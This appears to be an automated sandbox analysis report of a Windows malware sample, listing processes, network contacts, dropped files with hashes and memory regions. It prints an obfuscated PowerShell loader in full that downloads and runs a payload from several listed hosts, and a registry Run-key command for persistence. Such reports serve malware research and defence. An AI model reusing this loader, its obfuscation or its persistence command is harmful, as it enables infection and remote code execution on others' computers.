4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 moviesmacktalk.com udp
RO 89.42.218.27:443 moviesmacktalk.com tcp
RO 89.42.218.27:443 moviesmacktalk.com tcp
RO 89.42.218.27:443 moviesmacktalk.com tcp
RO 89.42.218.27:443 moviesmacktalk.com tcp
US 8.8.8.8:53 milanaces.com udp
BG 193.25.216.108:443 milanaces.com tcp
BG 193.25.216.108:443 milanaces.com tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.18.190.80:80 r10.o.lencr.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabA8DF.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2692-20-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

memory/2692-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/2692-23-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-22-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2692-25-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-24-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-26-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-27-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CKQ750OV55N18BSWUFGX.temp

MD5 9e3cc2afba423713dce0862a1e7665d2
SHA1 0bdb1a8f2eb12e130479cc48a0c47ffb6626dcd4
SHA256 7a2b0a49611fee20dc9456e231b724c213e46a0526bb9f8a80f7603a293cd6e3
SHA512 baa44caf9146d6a84b1ba6a688a3f71c210eac4d6fdc3c84395f2c3211b8375e28520293f000595e4d7e2de2b974f02821a41e06fa3ec5490e1438dd58e47f2d

C:\Users\Admin\AppData\Roaming\Coqueluche14.myx

MD5 8e72b507dadf417f0f922a8cc04533d5
SHA1 d2fb1f560d46af90f009069855dc1f94179c5b6a
SHA256 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c
SHA512 cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b

memory/2692-33-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-35-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-34-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

memory/3068-36-0x00000000065F0000-0x00000000075A0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6abcb26f8bccc06ba812dbffc5933a96
SHA1 4305c908a01dd8059406a15e6b1daaeb7e20db61
SHA256 1da0c861ce504db27e0e764d019af6adf23d5987a9498ffc6446365030793a77
SHA512 30448bb88214cd2059ec7718ad9245d3eb0d86666ed7d2e2ff6fbe6bea582c65afe0e78c22a7aaf084b1efdc4e123eceb980ad0bf99eb7bb26aad8896e1ff2ba

C:\Users\Admin\AppData\Local\Temp\Tar6597.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1240-54-0x0000000000B70000-0x0000000001BD2000-memory.dmp

memory/1240-56-0x0000000001BE0000-0x0000000002B90000-memory.dmp

memory/2692-59-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp